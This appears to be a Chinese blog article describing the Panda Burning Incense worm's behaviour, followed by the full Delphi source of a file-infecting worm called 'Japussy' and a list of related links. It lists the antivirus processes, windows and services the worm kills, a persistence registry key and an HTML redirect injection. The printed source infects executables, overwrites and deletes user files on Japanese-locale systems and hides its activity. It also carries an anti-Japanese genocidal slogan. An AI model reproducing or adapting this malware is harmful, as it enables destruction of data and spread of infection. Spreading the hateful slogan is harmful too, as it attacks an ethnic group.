“熊猫烧香”病毒的原理
“熊猫烧香” 这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能终止大量的反病毒软件进程并且会删除扩展名为gho的文件(gho文件是系统备份工具GHOST的备份文件),使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。
制作流程:
一、拷贝文件 病毒运行后,会把自己拷贝到C:\WINDOWS\System32\Drivers\spoclsv.exe
二、添加注册表自启动 病毒会添加自启动项HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe
三、病毒行为 :
- 每隔1秒寻找桌面窗口,并关闭窗口标题中含有以下字符的程序:QQKav、QQAV、防火墙、进程、VirusScan、网镖、杀毒、毒霸、瑞星、江民、黄山IE、超级兔子、优化大师、木马克星、木马清道夫、QQ病毒、注册表编辑器、系统配置实用程序、卡巴斯基反病毒、Symantec AntiVirus、Duba、esteem proces、绿鹰PC、密码防盗、噬菌体、木马辅助查找器、System Safety Monitor、Wrapped gift Killer、Winsock Expert、游戏木马检测大师、msctls_statusbar32、pjf(ustc)、IceSword,并使用键盘映射的方法关闭安全软件IceSword。
- 终止系统中以下的进程:Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、TBMon.exe、scan32.exe、Ravmond.exe、CCenter.exe、RavTask.exe、Rav.exe、Ravmon.exe、RavmonD.exe、RavStub.exe、KVXP.kxp、kvMonXP.kxp、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl132.exe
- 每隔18秒点击病毒作者指定的网页。
- 用命令行检查系统中是否存在共享,共享存在的话就运行net share命令关闭共享。
- 每隔6秒删除安全软件在注册表中的键值
- 通过修改注册表以下值,从而不显示电脑中隐藏的文件 :HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue -> 0x00
- 删除以下服务: navapsvc、wscsvc、KPfwSvc、SNDSrvc、ccProxy、ccEvtMgr、ccSetMgr、SPBBCSvc、Symantec Core LC、NPFMntor MskService、FireSvc
四、感染文件 病毒会感染扩展名为exe,pif,com,src的文件,把自己附加到文件的头部,并在扩展名为htm,html, asp,php,jsp,aspx的文件中添加一个网址(例如在文件末尾<javascript>window.location.href = "http://网址域名";</javascript>),用户一旦访问了该文件,浏览器就会跳转到该网址,从而达到增加点击量的目的。但病毒不会感染下列系统文件夹中的文件: WINDOW、Winnt、System Volume Information、Recycled、Windows NT、WindowsUpdate、Windows Media 。
“熊猫烧香”的源代码:
“熊猫烧香”是用Delphi工具编写的,首先解释一下为什么大部分的病毒木马等黑客软件都是用Delphi语言编写的?
原因:delphi是编译型语言,可以直接生成.exe运行程序,独立使用。C#是解释型的语言,得调用操作系统的dll和ocx,不方便。对于木马病毒来说,用delphi是最好的选择!
- 编译型语言:有的编程语言要求必须提前将所有源代码一次性转换成二进制指令,也就是生成一个可执行程序(Windows 下的 .exe),比如C语言、C++、Golang、Pascal(Delphi)、汇编等,这种编程语言称为编译型语言,使用的转换工具称为编译器。
- 解释型语言:有的编程语言可以一边执行一边转换,需要哪些源代码就转换哪些源代码,不会生成可执行程序,比如 Python、Javascript、PHP、Shell、Matlab 等,这种编程语言称为解释型语言,使用的转换工具称为解释器。
program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI {, Registry} ;const HeaderSize = 82432 ; // 病毒体的大小 IconOffset = $12EB8; // PE文件主图标的偏移量// 在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同// 查找2800000020的十六进制字符串可以找到主图标的偏移量 {
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; // PE文件主图标的大小--744字节 IconTail = IconOffset + IconSize; // PE文件主图标的尾部 ID = $ 44444444 ; // 感染标记// 垃圾码,以备写入 Catchword = ' If a race need to be killed out, it must be Yamato. ' + ' If a country need to be destroyed, it must be Japan! ' + ' *** W32.Japussy.Worm.A *** ' ;{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external ' Kernel32.dll ' ; // 函数声明 var
TmpFile: string ;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; // 日文操作系统标记 { 判断是否为Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result : = False;
Ver.dwOSVersionInfoSize : = SizeOf(TOSVersionInfo);if not GetVersionEx(Ver) thenExit;if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then // Win9x Result : = True;
end;{ 在流之间复制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos : = Src.Position;
dCurPos : = Dst.Position;
Src.Seek(sStartPos, 0 );
Dst.Seek(dStartPos, 0 );
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0 );
Dst.Seek(dCurPos, 0 );
end;{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }
procedure ExtractFile(FileName: string );
var
sStream, dStream: TFileStream;
begintry sStream : = TFileStream.Create(ParamStr( 0 ), fmOpenRead or fmShareDenyNone);try dStream : = TFileStream.Create(FileName, fmCreate);try sStream.Seek(HeaderSize, 0 ); // 跳过头部的病毒部分 dStream.CopyFrom(sStream, sStream.Size - HeaderSize);finally dStream.Free;end;finally sStream.Free;end;
except
end;
end;{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb : = SizeOf(Si);
Si.lpReserved : = nil;
Si.lpDesktop : = nil;
Si.lpTitle : = nil;
Si.dwFlags : = STARTF_USESHOWWINDOW;
Si.wShowWindow : = State;
Si.cbReserved2 : = 0 ;
Si.lpReserved2 : = nil;
end;{ 发带毒邮件 }
procedure SendMail;
begin// 哪位仁兄愿意完成之? end;{ 感染PE文件 }
procedure InfectOneFile(FileName: string );
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[ 0 .. 1 ] of Char;
begintry // 出错则文件正在被使用,退出 if CompareText(FileName, ' JAPUSSY.EXE ' ) = 0 then // 是自己则不感染 Exit;Infected : = False;IsPE : = False;SrcStream : = TFileStream.Create(FileName, fmOpenRead);try for i : = 0 to $ 108 do // 检查PE文件头 beginSrcStream.Seek(i, soFromBeginning);SrcStream.Read(Buf, 2 );if (Buf[ 0 ] = # 80 ) and (Buf[ 1 ] = # 69 ) then // PE标记 beginIsPE : = True; // 是PE文件 Break;end;end;SrcStream.Seek( - 4 , soFromEnd); // 检查感染标记 SrcStream.Read(iID, 4 );if (iID = ID) or (SrcStream.Size < 10240 ) then // 太小的文件不感染 Infected : = True;finally SrcStream.Free;end;if Infected or (not IsPE) then // 如果感染过了或不是PE文件则退出 Exit;IcoStream : = TMemoryStream.Create;DstStream : = TMemoryStream.Create;try aIcon : = TIcon.Create;try // 得到被感染文件的主图标(744字节),存入流 aIcon.ReleaseHandle;aIcon.Handle : = ExtractIcon(HInstance, PChar(FileName), 0 );aIcon.SaveToStream(IcoStream);finally aIcon.Free;end;SrcStream : = TFileStream.Create(FileName, fmOpenRead);// 头文件 HdrStream : = TFileStream.Create(ParamStr( 0 ), fmOpenRead or fmShareDenyNone);try // 写入病毒体主图标之前的数据 CopyStream(HdrStream, 0 , DstStream, 0 , IconOffset);// 写入目前程序的主图标 CopyStream(IcoStream, 22 , DstStream, IconOffset, IconSize);// 写入病毒体主图标到病毒体尾部之间的数据 CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);// 写入宿主程序 CopyStream(SrcStream, 0 , DstStream, HeaderSize, SrcStream.Size);// 写入已感染的标记 DstStream.Seek( 0 , 2 );iID : = $ 44444444 ;DstStream.Write(iID, 4 );finally HdrStream.Free;end;finally SrcStream.Free;IcoStream.Free;DstStream.SaveToFile(FileName); // 替换宿主文件 DstStream.Free;end;
except;
end;
end;{ 将目标文件写入垃圾码后删除 }
procedure SmashFile(FileName: string );
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begintry SetFileAttributes(PChar(FileName), 0 ); // 去掉只读属性 FileHandle : = FileOpen(FileName, fmOpenWrite); // 打开文件 try Size : = GetFileSize(FileHandle, nil); // 文件大小 i : = 0 ;Randomize;Max : = Random( 15 ); // 写入垃圾码的随机次数 if Max < 5 thenMax : = 5 ;Mass : = Size div Max; // 每个间隔块的大小 Len : = Length(Catchword);while i < Max do beginFileSeek(FileHandle, i * Mass, 0 ); // 定位// 写入垃圾码,将文件彻底破坏掉 FileWrite(FileHandle, Catchword, Len);Inc(i);end;finally FileClose(FileHandle); // 关闭文件 end;DeleteFile(PChar(FileName)); // 删除之 except
end;
end;{ 获得可写的驱动器列表 }
function GetDrives: string ;
var
DiskType: Word;
D: Char;
Str: string ;
i: Integer;
beginfor i : = 0 to 25 do // 遍历26个字母 beginD : = Chr(i + 65 );Str : = D + ' :'; DiskType : = GetDriveType(PChar(Str));// 得到本地磁盘和网络盘 if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) thenResult : = Result + D;
end;
end;{ 遍历目录,感染和摧毁文件 }
procedure LoopFiles(Path, Mask: string );
var
i, Count: Integer;
Fn, Ext: string ;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
beginif (SearchRec.Attr <> 16 ) and (SearchRec.Name <> ' . ' ) and(SearchRec.Name <> ' .. ' ) thenResult : = 0 // 不是目录 else if (SearchRec.Attr = 16 ) and (SearchRec.Name <> ' . ' ) and(SearchRec.Name <> ' .. ' ) thenResult : = 1 // 不是根目录 else Result : = 2 ; // 是根目录 end;
beginif (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0 ) then
beginrepeatPeekMessage(Msg, 0 , 0 , 0 , PM_REMOVE); // 调整消息队列,避免引起怀疑 if IsValidDir(SearchRec) = 0 thenbeginFn : = Path + SearchRec.Name;Ext : = UpperCase(ExtractFileExt(Fn));if (Ext = ' .EXE ' ) or (Ext = ' .SCR ' ) thenbeginInfectOneFile(Fn); // 感染可执行文件 endelse if (Ext = ' .HTM ' ) or (Ext = ' .HTML ' ) or (Ext = ' .ASP ' ) thenbegin// 感染HTML和ASP文件,将Base64编码后的病毒写入// 感染浏览此网页的所有用户// 哪位大兄弟愿意完成之? endelse if Ext = ' .WAB ' then // Outlook地址簿文件 begin// 获取Outlook邮件地址 endelse if Ext = ' .ADC ' then // Foxmail地址自动完成文件 begin// 获取Foxmail邮件地址 endelse if Ext = ' IND ' then // Foxmail地址簿文件 begin// 获取Foxmail邮件地址 endelse beginif IsJap then // 是倭文操作系统 beginif (Ext = ' .DOC ' ) or (Ext = ' .XLS ' ) or (Ext = ' .MDB ' ) or(Ext = ' .MP3 ' ) or (Ext = ' .RM ' ) or (Ext = ' .RA ' ) or(Ext = ' .WMA ' ) or (Ext = ' .ZIP ' ) or (Ext = ' .RAR ' ) or(Ext = ' .MPEG ' ) or (Ext = ' .ASF ' ) or (Ext = ' .JPG ' ) or(Ext = ' .JPEG ' ) or (Ext = ' .GIF ' ) or (Ext = ' .SWF ' ) or(Ext = ' .PDF ' ) or (Ext = ' .CHM ' ) or (Ext = ' .AVI ' ) thenSmashFile(Fn); // 摧毁文件 end;end;end;// 感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑 Sleep( 200 );until (FindNext(SearchRec) <> 0 );
end;
FindClose(SearchRec);
SubDir : = TStringList.Create;if (FindFirst(Path + ' *.* ' , faDirectory, SearchRec) = 0 ) then
beginrepeatif IsValidDir(SearchRec) = 1 thenSubDir.Add(SearchRec.Name);until (FindNext(SearchRec) <> 0 );end;
FindClose(SearchRec);
Count : = SubDir.Count - 1 ;for i : = 0 to Count do LoopFiles(Path + SubDir.Strings + ' ', Mask); FreeAndNil(SubDir);
end;{ 遍历磁盘上所有的文件 }
procedure InfectFiles;
var
DriverList: string ;
i, Len: Integer;
beginif GetACP = 932 then // 日文操作系统 IsJap : = True; // 去死吧! DriverList : = GetDrives; // 得到可写的磁盘列表 Len : = Length(DriverList);while True do // 死循环 beginfor i : = Len downto 1 do // 遍历每个磁盘驱动器 LoopFiles(DriverList + ' :', ' * . * ' ); //感染之 SendMail; // 发带毒邮件 Sleep( 1000 * 60 * 5 ); // 睡眠5分钟 end;
end;{ 主程序开始 }
beginif IsWin9x then // 是Win9x RegisterServiceProcess(GetCurrentProcessID, 1 ) // 注册为服务进程 else // WinNT begin// 远程线程映射到Explorer进程// 哪位兄台愿意完成之? end;// 如果是原始病毒体自己 if CompareText(ExtractFileName(ParamStr( 0 )), ' Japussy.exe ' ) = 0 thenInfectFiles // 感染和发邮件 else // 已寄生于宿主程序上了,开始工作 beginTmpFile : = ParamStr( 0 ); // 创建临时文件 Delete(TmpFile, Length(TmpFile) - 4 , 4 );TmpFile : = TmpFile + # 32 + ' .exe ' ; // 真正的宿主文件,多一个空格 ExtractFile(TmpFile); // 分离之 FillStartupInfo(Si, SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,0 , nil, ' . ' , Si, Pi); // 创建新进程运行之 InfectFiles; // 感染和发邮件 end;
end.
“熊猫烧香”病毒的原理相关推荐
- 熊猫烧香病毒背后,网络高手对决一个月
这是一波电脑病毒蔓延的狂潮.在两个多月的时间里,数百万电脑用户被卷将进去,那只憨态可掬.颔首敬香的"熊猫"除而不尽,成为人们噩梦般的记忆. 反病毒工程师们将它命名为"尼姆 ...
- 熊猫烧香病毒幕后黑手曝光 网络世界高手对决一个月
这是一波电脑病毒蔓延的狂潮.在两个多月的时间里,数百万电脑用户被卷将进去,那只憨态可掬.颔首敬香的"熊猫"除而不尽,成为人们噩梦般的记忆. 反病毒工程师们将它命名为"尼姆 ...
- 熊猫烧香病毒企业局域网网完整解决方案
继维金后的熊猫烧香病毒一度蔓延开来. .我们可能会因为工作繁忙忘记给金山毒霸客户端升级导致系统中该病毒.网上有各种针对该病毒的解决办法.我们也不去讨论其良莠了,在这里,主要面向各位负责金山毒霸企业版( ...
- 熊猫烧香病毒背后的***社会
通过"江湖传言"得知,在一个庞大的犯罪链条中,处于利润最丰厚环节的"老板"远在上海,他可能通过比"熊猫烧香"隐蔽得多的病毒,或者是其他不为外 ...
- 有人说是金山造了熊猫烧香病毒
在百度贴吧看到篇文章,作者臆断熊猫是金山出的,想到白天还跟珠海研发讨论过抓熊猫作者的事情.已经有了一些线索,可惜咱们这个国家对病毒制作者.传播者的打击力度...实在是差点儿意思. 原贴在[url]ht ...
- “熊猫烧香”病毒简介及特征
"熊猫烧香"病毒简介及特征 "武汉男生",俗称"熊猫烧香",这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html ...
- 熊猫烧香病毒完整解决方案
这个方案也广为传播,传播组真是好样的 熊猫烧香病毒无疑成了近期互联网最热门的关键字了,网上也能找到很多个有关熊猫烧香病毒的解决办法,这些方法不尽完美,再加上熊猫的变种很多,很多方法已经失效.这里提供一 ...
- 熊猫烧香病毒技术分析及应急解决方案
熊猫烧香病毒技术分析及应急解决方案 BY Delphiscn(http://blog.csdn.net/delphiscn)cnBlaster#hotmail.com 目录 A.简介 B.样本分析 C ...
- 【逆向】Delphi程序逆向之熊猫烧香病毒分析
1.前言 本文主要用于记录Delphi程序逆向的一些方法和技巧,以及熊猫烧香病毒的分析过程. 2.分析技巧 2.1 使用IDR或DEDE加载Delphi程序,导出Map文件,将Map文件导入OD. 2 ...
- 熊猫烧香病毒文化(图:熊猫烧香QQ表情,网友PS图片)
网友痛恨"熊猫烧香"病毒 出10万美金通缉(图) 吸引我的不是这10万美金通缉令,而是其中的 熊猫烧香QQ表情图片.哈哈,熊猫烧香病毒流行的都快流行出一种文化了.第一个由计算机病毒 ...
最新文章
- 空气质量html模板,基于HTML5+CSS3移动端空气质量APP的设计与实现
- apache camel 相关配置_小白在 linux 系统部署apache、mysql、Laravel 环境学习笔记!
- 腾讯产品面试题 | 如何把剃须刀卖给张飞?
- javaScript第二天(1)
- 33岁想从头学做网页设计_从头开始设计精美的移动应用
- 自学Java汇报(3)
- DebugView使用笔记
- Color Cube – 国产的优秀配色取色工具
- python class用法理解_通过钢铁侠变身快速理解Python的装饰器用法
- python爬虫怎么做_python爬虫怎么做?
- JAVA—字符串怎么转换成整数
- c语言int作用,C语言中的int max(int x,int y) 究竟有何作用?
- 如何在 WordPress 中启用WebP 图片?webp有什么优势?
- java if或_java中if条件语句里条件的并列
- word生成目录右对齐
- 房贷计算器html代码,html房贷计算器输出两个框怎么弄
- Druid后台监控与过滤器
- JavaScript 引用类型 读书笔记
- Vuforia+Unity AR项目开发测试
- 计算机英语个人陈述,英文个人陈述范文汇总,计算机专业
热门文章
- python初级樱花编程代码_python turtle绘制樱花树代码
- java我的世界损坏的种子,我的世界:5分钟让你通关游戏的种子,大神用这种子破了世界纪录...
- java核心技术 下载 网盘_【资源分享】某宝买的40000GB游戏,有你想要的游戏哦,可单独保存或下载...
- 最好用的十六进制编辑器010 Editor
- wps加载项的官方demo下载运行方式
- Python可视化--常用颜色
- C++与Python混合编程
- Android开发简单购物app源码,校园购物APP源码(适合新手学习)
- 电子电工产品IP防水测试及测试设备
- matlab俄罗斯方块说明,俄罗斯方块MATLAB版的代码